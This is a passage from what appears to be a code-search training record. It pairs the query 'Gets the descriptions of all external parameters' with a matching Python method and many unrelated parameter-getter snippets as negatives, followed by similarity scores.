return [\"k\", \"periodicity\", \"phase\", \"idivf\"]", "def get_resource_params(self):\n return Parameter.list()", "def get_resource_params(self):\n return Parameter.list()", "def get_params(self, pnames=None):\n l = []\n if pnames is None:\n pnames = self._params.keys()\n for pname in pnames:\n p = self._params[pname]\n if isinstance(p, Parameter):\n l.append(p)\n return l", "def getParameterList(self):\n inputList = []\n for name, n in zip(self._names, self._inputs):\n inputList += ['%s.x%d' % (name, i) for i in range(n)]\n return inputList", "def return_all_parameter_names():\n a = list(titles)\n a.append(r\"$\\chi^{2}$ per degree of freedom\")\n b = list(labels)\n b.append(\"chi2_per_dof\")\n 
return a, b", "def get_ext_param_default_values(self):\n num_param = core.xc_func_info_get_n_ext_params(self.xc_func_info)\n\n ret = []\n for p in range(num_param):\n tmp = core.xc_func_info_get_ext_params_default_value(self.xc_func_info, p)\n ret.append(tmp)\n\n return ret", "def build_parameters(self) -> List[str]:\n param_bits = []\n for name in self.parameters:\n param_bits.extend(self.build_parameter_by_name(name) or [])\n return param_bits", "def parameters(self):\n return self.pars", "def get_param_names(obj: Union[Type[_BaseTpcpObject], _BaseTpcpObject]) -> List[str]:\n cls = obj if isinstance(obj, type) else type(obj)\n parameters = list(_get_init_defaults(cls).values())\n for p in parameters:\n if p.kind == p.VAR_POSITIONAL:\n raise RuntimeError(\n \"tpcp algorithms and pipelines should always specify their parameters in the signature of their \"\n f\"__init__ (no varargs). {cls} doesn't follow this convention.\"\n )\n # Extract and sort argument names excluding 'self'\n return sorted([p.name for p in parameters])", "def get_param_texts(self):\n return self.param_texts", "def step_extract_parameters(self) -> list:\n result = []\n if self.has_step_field(\"task.parameters\"):\n for param in self.step_field(\"task.parameters\"):\n for key in param:\n result += [\"-p\", key, param[key]]\n return result", "def return_parameter_names():\n return list(titles), list(labels)", "def named_trainable_parameters(self) -> List[str]:\n return [name for name, p in self._model.named_parameters() if p.requires_grad]", "def potential_parameters(cls):\n return [\"k\", \"length\"]", "def print_param_names(model):\n for (param_name, param) in model.get_parameters().items():\n print(param_name, param.shape)", "def sensor_parameters_list(self):\n return list(self.params_f.keys()) + list(self.params_i.keys())", "def get_aux_parameters(self, name):\n param = {}\n if self.aux_windows.has_key(name):\n for key in dir(self.aux_windows[name]):\n if key.startswith('__'): continue\n value = getattr(self.aux_windows[name], key)\n if callable(value): continue\n param[key] = value\n\n return param\n return None", "def parameter_names_from_model(model):\n variables = model.getVariables()\n itvar = variables.iterator()\n names = []\n for i in xrange(len(variables)):\n currentvar = itvar.Next()\n names.append(currentvar.GetName())\n return names", "def params(self):\n return self._pars", "def extract_parameters(self) -> Dict[str, Set[str]]:\n regex = \"\\{([A-Za-z0-9_]+)\\}\"\n reserved_parameters = [\n \"output\",\n \"input\",\n \"output_vec\",\n \"input_vec\",\n \"df\",\n \"vec_open\",\n \"vec_close\",\n ]\n parameters = {}\n for scope in self.scopes:\n parameters[scope] = set(\n [\n x\n for x in re.findall(regex, self.call)\n if x not in reserved_parameters\n ]\n )\n return parameters", "def potential_parameters(cls):\n return [\"k\", \"angle\"]", "def getListOfParameters(self):\n return self.model.getListOfParameters()", "def parameters(self):\n return self._params", "def layerParamKeys(self):\n return self._layerParamKeys", "def parameters(self):\n params = []\n for layer in (self.conv1, self.conv2, self.conv3, self.conv4, self.dense1, self.dense2):\n params += list(layer.parameters)\n return params", "def source_parameter_names(self):\n return [x for x, y in self.transformations.items() if isinstance(y, str)]", "def parameters(self):\n pass", "def param(self):\r\n paramlist = []\r\n gradlist = []\r\n\r\n for layer in self.layers:\r\n try:\r\n layer_param, layer_grad = layer.param()\r\n paramlist = paramlist + 
layer_param\r\n gradlist = gradlist + layer_grad\r\n except ValueError:\r\n continue\r\n return paramlist, gradlist", "def get_parameters(**kwargs):\r\n parameters = vars(global_file.params)\r\n for key, value in kwargs.items():\r\n parameters[str(key)] = value\r\n return parameters", "def parameters(self):\n return [i.parameter for i in self.joints.values()]", "def getListOfParameters(self, *args):\n return _libsbml.KineticLaw_getListOfParameters(self, *args)", "def _get_parameters(self):\n return (self.SYMBOL, self.parameterArray())", "def get_parameters(self):\n return self.parameters", "def get_parameters(self):\n return self.parameters", "def get_parameters(self):\n return self.parameters", "def get_parameters(self):\n return self.parameters", "def get_parameters(self):\n return self.parameters", "def get_original_names_and_sharded_parameters(self):\n orig_named_parameters = []\n for module_name, m in self.named_modules(): # includes self\n if isinstance(m, XlaFullyShardedDataParallel):\n prefix = \"\" if module_name == \"\" else module_name + \".\"\n for p in self.sharded_params:\n n = prefix + p._orig_name\n n = n.replace(\"_fsdp_wrapped_module.\", \"\").replace(\"_fpw_module.\", \"\")\n orig_named_parameters.append((n, p))\n\n return orig_named_parameters", "def get_params_iter(self):\n return []", "def get_parameter_names(self, exclude_pop_model=False):\n if (self._population_model is None) or exclude_pop_model:\n names = self._mechanistic_model.parameters()\n for error_model in self._error_models:\n names += error_model.get_parameter_names()\n return names\n\n return self._population_model.get_parameter_names()", "def params(self):\n return [p for sublist in [o.params for o in self.obs] for p in sublist]", "def get_params(self):\n raise NotImplementedError", "def parameters(self):\n #print \"in instrument.parameter()\"\n return self._params", "def _create_parameter_names(self):\n self._parameter_names = self.parameter_schema[\"problem\"][\"names\"]", "def get_resource_params(self):\n return SBE37Parameter.list()" ]
[ "0.77504754", "0.7389947", "0.72158164", "0.71607", "0.71043503", "0.7083737", "0.7037365", "0.70315456", "0.7013595", "0.70036983", "0.698914", "0.687916", "0.6841593", "0.6833137", "0.68269855", "0.6797805", "0.6785064", "0.6723883", "0.6707179", "0.6698673", "0.6685417", "0.6665723", "0.66453034", "0.66269267", "0.6609356", "0.6596573", "0.658621", "0.65673566", "0.6565315", "0.65632", "0.65403926", "0.6519185", "0.6518851", "0.65031683", "0.6503134", "0.6495234", "0.6490103", "0.64885306", "0.64810586", "0.64810586", "0.6476288", "0.64712083", "0.64706576", "0.64566225", "0.64416826", "0.6435733", "0.6412809", "0.6401734", "0.6401713", "0.6396525", "0.6381162", "0.6379899", "0.63479406", "0.63391936", "0.63391936", "0.63377947", "0.63377947", "0.63085854", "0.6307663", "0.62927324", "0.62889624", "0.6277699", "0.627462", "0.6267084", "0.62537014", "0.62488204", "0.6241338", "0.62366796", "0.62337875", "0.6224051", "0.6204884", "0.6203125", "0.6194832", "0.6192677", "0.61702985", "0.6168539", "0.61647254", "0.61627674", "0.61624384", "0.61574763", "0.6134144", "0.613352", "0.6129292", "0.6115694", "0.61138", "0.6112525", "0.61120963", "0.611078", "0.611078", "0.611078", "0.611078", "0.611078", "0.61087155", "0.61072356", "0.6091907", "0.6091387", "0.60906893", "0.6089468", "0.60881823", "0.6067726" ]
0.7800671
0
Gets the descriptions of all external parameters
def get_ext_param_descriptions(self): num_param = core.xc_func_info_get_n_ext_params(self.xc_func_info) ret = [] for p in range(num_param): tmp = core.xc_func_info_get_ext_params_description(self.xc_func_info, p) ret.append(tmp.decode("UTF-8")) return ret
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _external_params():\n list_ext_params = []\n list_ext_params.append(\n (hoomd.md.external.field.Periodic, \"params\",\n list([dict(A=1.5, i=1, w=3.5, p=5),\n dict(A=10, i=0, w=3.4, p=2)]), _evaluate_periodic))\n list_ext_params.append(\n (hoomd.md.external.field.Electric, \"E\", list([\n (1, 0, 0),\n (0, 2, 0),\n ]), _evaluate_electric))\n return list_ext_params", "def getParameters(self): #$NON-NLS-1$\r", "def parameters(self):\n return []", "def print_all_params(self, disp=True):\n descriptions = {'general': {}}\n for name, param in self.params.items():\n descriptions['general'][name] = param.get_description()\n\n for comp, comp_obj in self.components.items():\n descriptions[comp] = {}\n for name in comp_obj.get_params():\n descriptions[comp][name] = comp_obj.get_param_description(name)\n return self._print_params(descriptions, disp)", "def get_resource_params():\n return Parameter.list()", "def print_params():\n\n help_out = convert_phil_to_text(master_phil, att_level=1)\n txt_out = convert_phil_to_text(master_phil)\n\n return help_out, txt_out", "def get_parameters_list(self):\n return self.description[\"config\"][\"values\"].keys()", "def paramDetails(cls):\n return {\n 'dim': (10, 20, 2, 20),\n 'nIter': (1, 10, 2, 5),\n 'lamb': (.1, 1., .1, .05),\n 'alph': (30, 50, 5, 40)\n }", "def display_parameters(self):\n\n self.logging.debug(\"============\")\n for attr in self.parm_list:\n self.logging.debug(attr.label + \" (\" + attr.when + \")\" + \" = \" + str(attr.value))\n self.logging.debug(\"============\")", "def get_ext_param_names(self):\n num_param = core.xc_func_info_get_n_ext_params(self.xc_func_info)\n\n ret = []\n for p in range(num_param):\n tmp = core.xc_func_info_get_ext_params_name(self.xc_func_info, p)\n ret.append(tmp.decode(\"UTF-8\"))\n\n return ret", "def get_parameter_descriptions(parameters):\n\n lines = []\n opt_lines = []\n for param in parameters:\n param_name = check_param(flatten_param(param['name']))\n if param['required']:\n required = 'required'\n lines.append(':param {0}: ({1}) {2}'.format(param_name, required,\n param['description']))\n lines.append(':type {0}: {1}'.format(param_name, param['type']))\n else:\n required = 'optional'\n opt_lines.append(':param {0}: ({1}) {2}'.format(param_name,\n required, param['description']))\n opt_lines.append(':type {0}: {1} or None'.format(param_name,\n param['type']))\n\n return lines + opt_lines", "def help(cls):\n print(cls._LIST_PARAMETERS)", "def print_params(self):\n s = self._list_params()+\"\\n\"\n if 'scale_params' in self.__dict__.keys():\n s += self.scale_params._list_params()+\"\\n\"\n if 'atmospheric_params' in self.__dict__.keys():\n if self.atmospheric_params is not None:\n s += self.atmospheric_params._list_params()+\"\\n\"\n\n if 'atemperature_params' in self.__dict__.keys():\n if self.atemperature_params is not None:\n s += self.atemperature_params._list_params()+\"\\n\"\n\n if 'oceanic_params' in self.__dict__.keys():\n if self.oceanic_params is not None:\n s += self.oceanic_params._list_params()+\"\\n\"\n\n if 'ground_params' in self.__dict__.keys():\n if self.ground_params is not None:\n s += self.ground_params._list_params()+\"\\n\"\n\n if 'gotemperature_params' in self.__dict__.keys():\n if self.gotemperature_params is not None:\n s += self.gotemperature_params._list_params() + \"\\n\"\n\n print(\"Qgs v0.2.8 parameters summary\")\n print(\"=============================\\n\")\n print(s)", "def get_params(self):", "def parameter_names(self) -> List[str]:", "def parameters(self):\n pass", "def 
get_resource_params(self):\n return Parameter.list()", "def get_resource_params(self):\n return Parameter.list()", "def _get_parameters(self) -> list:\n return self.parameters", "def get_param_texts(self):\n return self.param_texts", "def gather_experiment_parameters(self):\n consts = win32com.client.constants.__dicts__[0]\n exp_params = [r for r in consts.keys() if len(r.split(\"EXP_\")) > 1]\n dm_params = [r for r in consts.keys() if len(r.split(\"DM_\")) > 1]\n self.app_param = {} \n self.appdoc_param = {} \n for p in exp_params:\n self.app_param.update({p:self.app.GetParam(consts[p])})\n\n for p in dm_params:\n #self.appdoc_param.update({p:self.app.GetParam(consts[p])}) bug? call appdoc? CP\n\n self.appdoc_param.update({p:self.app.GetParam(consts[p])})", "def get_params(self):\n pass", "def params_desc(self):\n return \"{}/{}/{}/{}\".format(\n self.learning_rate, self.movement, self.milestones, self.gamma\n )", "def get_params_list():\n return common.QOL_PARAMS", "def display_parameters(self):\n l = []\n for param in self.parameters.all():\n if len(param.value) > 16:\n l.append(u\"{}={}...\".format(param.name, param.value[:16]))\n else:\n l.append(u\"{}={}\".format(param.name, param.value))\n return \"; \".join(l)", "def print_params(self):\n print(self._list_params())", "def parameters(self):\n return [term.parameter for term in self.terms]", "def parameters(self):", "def get_params(self):\n return []", "def param_strs(self):\n name_len = max(len(p.name) for p in self)\n value_len = max(len(p.value_str) for p in self.params.values())\n units_len = max(len(p.units) for p in self.params.values())\n return [(p.name.ljust(name_len), p.value_str.ljust(value_len),\n p.units.ljust(units_len), p.__doc__)\n for p in self.params.values() if p]", "def parameters(self):\n return self.pars", "def param(self):\r\n\r\n return []", "def parameters(self):\n return self._params", "def param(self):\n return []", "def param(self):\n return []", "def print_params(env) -> None:\n dict_pretty_print(env.config['parameters'])", "def show_parameters(self):\n with np.printoptions(precision=3, suppress=True):\n print('number of wind phase = {}'.format(self.ncomp))\n print('galactic parameter = {}'.format(self.scaling_field))\n print('reference height = {}'.format(self.z0))\n for p in ['cool_params','hot_params','params','ref_params','scaling_params']:\n params = getattr(self,p)\n print(p)\n for k,v in params.items():\n print(' {} = {}'.format(k,v))", "def get_all_component_parameters(self) -> Dict[str, Any]:\n return self._node[\"app_data\"][\"component_parameters\"]", "def param(self):\r\n return []", "def GetParameters(cls):\n return [\n ParameterDefinition('csvList', 'IN', description='list of all csv trace files'),\n ParameterDefinition('logoPath', 'IN', description='path to the logo image file to be included as watermark (optional)'),\n ]", "def get_diameters():\n return Global_Module.global_diameters", "def parameters(self):\n #print \"in instrument.parameter()\"\n return self._params", "def desc(self) -> List[str]:\n format_data: dict = {\n key: val\n for key, val in self.__dict__.items()\n if (\n not key.startswith(\"_\") and key != \"desc\" and not callable(val)\n )\n }\n format_data.update(self._kwargs)\n ret: List[str] = []\n for descr in self._desc:\n try:\n descr = descr % format_data\n except Exception as kerr:\n raise PyParamException(\n f\"Description of {self.namestr()!r} is formatting \"\n \"using kwargs from contructor. \\n\"\n f\"- desc: {descr}\\n\"\n f\"- key : {{... 
{str(kerr)[1:-1]} ...}}\"\n ) from None\n else:\n ret.append(descr)\n return ret", "def parameters(self):\n return [p for _, a in vars(self).items() for p in self._params(a)]", "def printConf(self):\n print \"\"\n for pname, pvalue in self.neededParams.items():\n print pname, pvalue\n for pname, pvalue in self.optionalParams.items():\n print pname, pvalue", "def params(self) -> dict:\n\n if not self.exp_metadata.parameters:\n self.exp_metadata.parameters = {}\n return self.exp_metadata.parameters", "def get_params(self):\n raise NotImplementedError", "def get_required_parameters(self) -> list:\n results = []\n if self.no_params or self.params_optional:\n return []\n else:\n for parameter, parameter_details in self.parameters.items():\n # Fixing issue #92\n # if parameter == \"effect\":\n # continue\n if not parameter_details.default_value:\n results.append(parameter_details.name)\n return results", "def summary_parameters(self):\n text = re.sub(r'\\r?\\n', ' - ', self.opt.text[:200])\n return {'adding': text}", "def summary_parameters(self):\n return {'filters': ', '.join(self.getOption('filters'))}", "def get_parameters_with_expert_knowledge(self) -> List[str]:\n return sorted(list(set([p for p, _ in self.expert_knowledge])))", "def getListOfParameters(self):\n return self.model.getListOfParameters()", "def param_description(hf, var):\n val = hf['/input/params/%s' % var].value\n if type(val) != str:\n val = val.decode('UTF-8')\n val = unpickle(val)\n desc = val.description\n\n if desc:\n return desc\n return var", "def parameters(self) -> Dict[str, Any]:\n return self.trainer_parameters", "def parameters(self) -> Dict[str, str]:\n return self._parameters", "def parameters(self):\n return self._params", "def params():\n raise NotImplementedError", "def create_parameters_description():\n description = OrderedDict()\n description['GeneralArguments'] = [\n {\n 'main_argument_name': '--config-file',\n 'argument_name_options': ['--config'],\n 'parameter_name': 'config_file',\n 'help': \"\"\"A json-encoded configuration file, in which one can specify the parameters\n for all detectors in use as well as some general parameters for the whole run.\n The encoded object should therefore be a dictionary,\n with possible top-level keys 'GeneralArguments' (general parameters, not relevant\n to a detector class), 'SaccadeDetector', 'BlinkDetector', 'FixationDetector'\n and 'SmoothPursuitDetector'.\n\n The value for each of the present keys should in turn be a dictionary with keys\n identical to the longest argument names below, without the eye movement name prefix.\n An example (and equivalent to default parameters) configuration file is provided\n in default_parameters.conf.json and includes all possible keys.\n\n In your custom configuration file you do not have to specify any the parameter values,\n missing keys will be considered to have the default value.\n\n For default values, you can consult the respective classes' __init__ methods in\n saccade_detector.py, blink_detector.py, fixation_detector.py and sp_detector.py.\n\n\n Values given through the console interface override the ones in the config file.\"\"\",\n 'kwargs': {}\n },\n {\n 'main_argument_name': '--input-folder',\n 'argument_name_options': ['--in'],\n 'parameter_name': 'input_folder',\n 'help': 'From where to load the gaze points data. If absent, must be present in --config-file file. '\n 'This folder is assumed to have subfolders that correspond to videos, for which recordings '\n 'were made. 
Each such subdirectory should contain gaze files (one file per observer).',\n 'kwargs': {}\n },\n {\n 'main_argument_name': '--gaze-file-pattern',\n 'argument_name_options': ['--pattern'],\n 'parameter_name': 'gaze_file_pattern',\n 'help': 'Will look for such files in all subdirectories of --input-folder. '\n 'For GazeCom, \\'*.arff\\' is a recommended value (or \\'*.coord\\', if dealing with original dataset files). '\n 'One can use this parameter to match some name pattern as well (not just the file extension), '\n 'for example with \\'*_needed_files_*.arff\\'. \\n'\n 'If no wildcard symbol is found in the provided string, it is assumed to be just the file name '\n 'suffix, so it will be prepended with a wildcard symbol (i.e. \".coord\" will become \"*.coord\").',\n 'kwargs': {}\n },\n {\n 'main_argument_name': '--input-data-type',\n 'argument_name_options': ['--type'],\n 'parameter_name': 'input_data_type',\n 'help': 'Type of data loader to use (if not specified, will try to detect automatically)',\n 'kwargs': {'choices': ['DSF', 'ARFF', 'labelled ARFF']}\n },\n {\n 'main_argument_name': '--verbose',\n 'argument_name_options': ['-v'],\n 'parameter_name': 'verbose',\n 'default': None,\n 'help': 'Whether to output some information about the progress of the run to STDERR',\n 'kwargs': {'action': 'store_const', 'const': True} # only like this can support the default of None\n # (not to override the config all the time\n # with a missing value)\n },\n {\n 'main_argument_name': '--movies',\n 'argument_name_options': ['-m'],\n 'parameter_name': 'movies',\n 'help': 'Which movies out of the input folder to use (might be useful for train/test split). '\n 'The gaze data is supposed to be put under respective directories in the input folder. '\n 'If none are given, all available ones are used.',\n 'kwargs': {'nargs': '+', 'default': None}\n },\n {\n 'main_argument_name': '--output-folder',\n 'argument_name_options': ['--out'],\n 'parameter_name': 'output_folder',\n 'help': 'Where to output the resulting labelled data (if empty, will create a new temporary directory)',\n 'kwargs': {}\n },\n ]\n\n description['SaccadeDetector'] = [\n {\n 'main_argument_name': '--tolerance',\n 'argument_name_options': ['--tol'],\n 'parameter_name': 'tolerance',\n 'help': 'The relative size of the area outside the screen that is still considered to be legal',\n 'kwargs': {'type': float}\n },\n {\n 'main_argument_name': '--threshold-onset-fast-degree-per-sec',\n 'argument_name_options': ['--threshold-onset-fast'],\n 'parameter_name': 'threshold_onset_fast_degree_per_sec',\n 'help': 'Threshold for initialization of saccade detection, in degrees per second',\n 'kwargs': {'type': float}\n },\n {\n 'main_argument_name': '--threshold-onset-slow-degree-per-sec',\n 'argument_name_options': ['--threshold-onset-slow'],\n 'parameter_name': 'threshold_onset_slow_degree_per_sec',\n 'help': 'A slower threshold for saccade onset detection, in degrees per second',\n 'kwargs': {'type': float}\n },\n {\n 'main_argument_name': '--threshold-offset-degree-per-sec',\n 'argument_name_options': ['--threshold-offset'],\n 'parameter_name': 'threshold_offset_degree_per_sec',\n 'help': 'Threshold for saccade offset detection, in degrees per second',\n 'kwargs': {'type': float}\n },\n {\n 'main_argument_name': '--max-speed-degree-per-sec',\n 'argument_name_options': ['--max-speed'],\n 'parameter_name': 'max_speed_degree_per_sec',\n 'help': 'Maximum speed of saccadic eye movements',\n 'kwargs': {'type': float}\n },\n {\n 'main_argument_name': 
'--min-duration-microsec',\n 'argument_name_options': ['--min-duration'],\n 'parameter_name': 'min_duration_microsec',\n 'help': 'Minimal saccade duration threshold',\n 'kwargs': {'type': float}\n },\n {\n 'main_argument_name': '--max-duration-microsec',\n 'argument_name_options': ['--max-duration'],\n 'parameter_name': 'max_duration_microsec',\n 'help': 'Maximal saccade duration threshold',\n 'kwargs': {'type': float}\n },\n {\n 'main_argument_name': '--velocity-integral-interval-microsec',\n 'argument_name_options': ['--velocity-integral-interval'],\n 'parameter_name': 'velocity_integral_interval_microsec',\n 'help': 'Interval duration, over which to integrate velocity computation.',\n 'kwargs': {'type': float}\n },\n ]\n\n description['BlinkDetector'] = [\n {\n 'main_argument_name': '--max-distance-to-saccade-microsec',\n 'argument_name_options': ['--max-distance-to-saccade'],\n 'parameter_name': 'max_distance_to_saccade_microsec',\n 'help': 'Threshold for distance from a definite blink to a nearby saccade, which will be marked as blink '\n 'as well.',\n 'kwargs': {'type': float}\n },\n ]\n\n description['FixationDetector'] = [\n {\n 'main_argument_name': '--prefiltering-interval-spread-threshold-degrees',\n 'argument_name_options': ['--prefiltering-interval-spread-threshold'],\n 'parameter_name': 'prefiltering_interval_spread_threshold_degrees',\n 'help': 'All the intersaccadic intervals shorter than this will be deemed fixations',\n 'kwargs': {'type': float}\n },\n {\n 'main_argument_name': '--min-sp-duration-microsec',\n 'argument_name_options': ['--min-sp-duration'],\n 'parameter_name': 'min_sp_duration_microsec',\n 'help': 'Minimal duration of a potential SP candidate (fast-moving samples shorter than this threshold '\n 'are labelled as noise)',\n 'kwargs': {'type': float}\n },\n {\n 'main_argument_name': '--sliding-window-width-microsec',\n 'argument_name_options': ['--sliding-window-width'],\n 'parameter_name': 'sliding_window_width_microsec',\n 'help': 'Sliding window for coordinates smoothing',\n 'kwargs': {'type': float}\n },\n {\n 'main_argument_name': '--normalization-sliding-window-size-samples',\n 'argument_name_options': ['--normalization-sliding-window'],\n 'parameter_name': 'normalization_sliding_window_size_samples',\n 'help': 'A moving average sliding window size (to normalize the data)',\n 'kwargs': {'type': int}\n },\n {\n 'main_argument_name': '--speed-threshold-degrees-per-sec',\n 'argument_name_options': ['--speed-threshold'],\n 'parameter_name': 'speed_threshold_degrees_per_sec',\n 'help': 'Biggest plausible speed for a noisy fixation',\n 'kwargs': {'type': float}\n },\n {\n 'main_argument_name': '--sliding-window-criterion',\n 'argument_name_options': ['--sliding-window'],\n 'parameter_name': 'sliding_window_criterion',\n 'help': 'Defines the way we check the samples with the sliding_window_criterion threshold: '\n 'either compute the average speed in the current window, or get the spread of '\n 'the gaze points (i.e. 
biggest XY bounding box side), divided by the duration',\n 'kwargs': {'choices': ['speed', 'spread']}\n },\n {\n 'main_argument_name': '--intersaccadic-interval-duration-threshold-microsec',\n 'argument_name_options': ['--intersaccadic-interval-duration-threshold'],\n 'parameter_name': 'intersaccadic_interval_duration_threshold_microsec',\n 'help': 'Minimal size of the intersaccadic interval to apply the step with the moving average analysis',\n 'kwargs': {'type': float}\n },\n ]\n\n description['SmoothPursuitDetector'] = [\n # a mutually exclusive group\n [\n {\n 'main_argument_name': '--min-pts',\n 'argument_name_options': [],\n 'parameter_name': 'min_pts',\n 'soft_type': int,\n 'help': 'An integer indicating the minimum number of points required to form a core point\\'s '\n 'neighbourhood, or a string \\'num_observers\\' (meaning that the actual number of observers '\n 'for each movie will be substituted, depending on the data set provided).\\n'\n 'This option is mutually exclusive with --min-observers.',\n 'kwargs': {}\n },\n {\n 'main_argument_name': '--min-observers',\n 'argument_name_options': [],\n 'parameter_name': 'min_observers',\n # first try casting to int, then to float (since int cast will fail for a float)\n 'soft_type': [int, float],\n 'help': 'Either a floating point in [0.0; 1.0] range (indicating the share of all the present '\n 'observers per movie) or int [2; +\\inf) (indicating the absolute threshold for '\n 'observer count in the core point\\'s neighbourhood).\\n'\n 'This option is mutually exclusive with --min-pts.',\n 'kwargs': {}\n }\n ],\n {\n 'main_argument_name': '--eps-deg',\n 'argument_name_options': ['--eps'],\n 'parameter_name': 'eps_deg',\n 'help': 'Spatial Euclidean distance threshold that defines the neighbourhood in the XY-plane',\n 'kwargs': {'type': float}\n },\n {\n 'main_argument_name': '--time-slice-microsec',\n 'argument_name_options': ['--time-slice'],\n 'parameter_name': 'time_slice_microsec',\n 'help': 'Width of the time slice that defines the size of the neighbourhood on the time axis.',\n 'kwargs': {'type': float}\n },\n ]\n\n return description", "def describe_parameters(params):\n param_date = {}\n try:\n for param_filter in params:\n paginator = SSM.get_paginator('describe_parameters')\n params = paginator.paginate(\n ParameterFilters=[\n {\n 'Key': 'Name',\n 'Option': 'Contains',\n 'Values': [\n param_filter\n ]\n }\n ],\n )\n for resp_dict in params:\n if resp_dict['Parameters']:\n for param_name in resp_dict['Parameters']:\n param_date[param_name['Name']\n ] = param_name['LastModifiedDate']\n return param_date\n except ClientError as cleerror:\n raise cleerror\n except ParamValidationError as paramerror:\n raise paramerror", "def __prepare_general_parameters_contents(general_params: dict) -> list:\n\n general_parameters_contents = list()\n\n general_parameters_contents.append(\n f' {len(REAXFF_GENERAL_PARAMS)} ! Number of general parameters\\n')\n\n for key, value in general_params.items():\n general_parameters_contents.append(f' {value:.4f} ! 
{key}\\n')\n\n return general_parameters_contents", "def _get_parameters(self):\n return None", "def get_parameters(self):\r\n raise Exception(\"Not implemented (server-side parameter initialization)\")", "def parameters(self) -> Mapping[str, str]:\n return pulumi.get(self, \"parameters\")", "def get_params(self, deep=...):\n ...", "def get_params(self):\n\n return None", "def get_params(self):\n\n return None", "def get_params(self):\n\n return None", "def potential_parameters(cls):\n return [\"k\", \"periodicity\", \"phase\", \"idivf\"]", "def potential_parameters(cls):\n return [\"k\", \"periodicity\", \"phase\", \"idivf\"]", "def get_resource_params(self):\n return SBE37Parameter.list()", "def get_parameters(self):\n return self.parameters", "def get_parameters(self):\n return self.parameters", "def get_parameters(self):\n return self.parameters", "def get_parameters(self):\n return self.parameters", "def get_parameters(self):\n return self.parameters", "def potential_parameters(cls):\n return [\"k\", \"length\"]", "def step_extract_parameters(self) -> list:\n result = []\n if self.has_step_field(\"task.parameters\"):\n for param in self.step_field(\"task.parameters\"):\n for key in param:\n result += [\"-p\", key, param[key]]\n return result", "def return_all_parameter_names():\n a = list(titles)\n a.append(r\"$\\chi^{2}$ per degree of freedom\")\n b = list(labels)\n b.append(\"chi2_per_dof\")\n return a, b", "def params(self):\n return self._pars", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def get_optional_parameters(self) -> list:\n results = []\n if self.no_params or self.params_required:\n return []\n else:\n for parameter, parameter_details in self.parameters.items():\n # Fixing issue #92\n # if parameter == \"effect\":\n # continue\n if parameter_details.default_value:\n results.append(parameter_details.name)\n return results", "def get_params(self, params, name_request):\n self.write('')\n for elem in params:\n request_type = elem['type'] if elem.get('type', None) else 'schema'\n name = elem['name']\n if elem.get('required', None):\n name += '(required)'\n schema = elem.get('schema', None)\n name = f':{name_request} {request_type} {name}:'\n if schema:\n definition = schema['$ref'].split('/')[-1]\n self.write(name + f' :ref:`{definition}`', 1)\n self.write('')\n else:\n desc = elem.get('description', '')\n self.write(name)\n self.write(f'{desc}', self.indent_depth + 1)\n self.write('')", "def _get_params(self):\r\n return self.k._get_params()", "def getListOfParameters(self, *args):\n return _libsbml.KineticLaw_getListOfParameters(self, *args)", "def get_ext_param_default_values(self):\n num_param = core.xc_func_info_get_n_ext_params(self.xc_func_info)\n\n ret = []\n for p in range(num_param):\n tmp = core.xc_func_info_get_ext_params_default_value(self.xc_func_info, p)\n ret.append(tmp)\n\n return ret", "def parameter_names(self) -> list:\n parameters = []\n parameters.extend(self.properties.parameter_names)\n return parameters", "def _describe(self) -> Dict[str, Any]:", "def getParameterInfo(self):\n feature_class = arcpy.Parameter(\n name = 'in_features',\n displayName = 'In Features',\n direction = 'Input',\n 
datatype = 'GPFeatureLayer',\n parameterType = 'Required')\n\n field_mappings = arcpy.Parameter(\n name = 'in_fields',\n displayName = 'In Fields',\n direction = 'Input',\n datatype = 'GPFieldInfo',\n parameterType = 'Required')\n\n field_mappings.parameterDependencies = [feature_class.name]\n\n output_dir = arcpy.Parameter(\n name = 'output_dir',\n displayName = 'Output folder',\n direction = 'Input',\n datatype = 'DEFolder',\n parameterType = 'Required')\n\n output_name = arcpy.Parameter(\n name = 'output_name',\n displayName = 'Output filename',\n direction = 'Input',\n datatype = 'GPString',\n parameterType = 'Required')\n\n convert_4326 = arcpy.Parameter(\n name = 'convert_4326',\n displayName = 'Convert to WGS84?',\n direction = 'Input',\n datatype = 'Boolean',\n parameterType = 'Optional')\n convert_4326.value = 'True'\n\n convert_geojson = arcpy.Parameter(\n name = 'convert_geojson',\n displayName = 'Convert to GeoJSON?',\n direction = 'Input',\n datatype = 'Boolean',\n parameterType = 'Optional')\n convert_geojson.value = 'True'\n\n convert_kmz = arcpy.Parameter(\n name = 'convert_kmz',\n displayName = 'Convert to KMZ?',\n direction = 'Input',\n datatype = 'Boolean',\n parameterType = 'Optional')\n convert_kmz.value = 'True'\n\n convert_csv = arcpy.Parameter(\n name = 'convert_csv',\n displayName = 'Convert to CSV?',\n direction = 'Input',\n datatype = 'Boolean',\n parameterType = 'Optional')\n\n convert_metadata = arcpy.Parameter(\n name = 'convert_metadata',\n displayName = 'Convert metadata to markdown?',\n direction = 'Input',\n datatype = 'Boolean',\n parameterType = 'Optional')\n\n debug = arcpy.Parameter(\n name = 'debug',\n displayName = 'Debug',\n direction = 'Input',\n datatype = 'Boolean',\n parameterType = 'Optional')\n\n return [feature_class, field_mappings, output_dir, output_name,\n convert_4326, convert_geojson, convert_kmz, convert_csv,\n convert_metadata, debug]", "def parameters_names(cls):\n return cls._Parameters._fields", "def displayDataDescr(cls):\n return (\n \"Parameter\",\n \"Auto range\",\n \"Lower\",\n \"Upper\",\n \"Number of bins\",\n \"X-axis scaling\",\n \"Y-axis weighting\"\n )", "def parameterNames(self, p_int): # real signature unknown; restored from __doc__\n return []", "def parameters(self):\n return self.vars", "def print_general_param(self, name=None, disp=True):\n\n if name is None:\n list = {}\n\n for name in self.params:\n list[name] = self.params[name].get_description()\n\n return self._print_params({'general': list}, disp)\n else:\n if name not in self.params:\n raise IndexError('%s is not a valid general parameter ' % name)\n\n return self._print_params({'general': {name: self.params[name].get_description()}}, disp)" ]
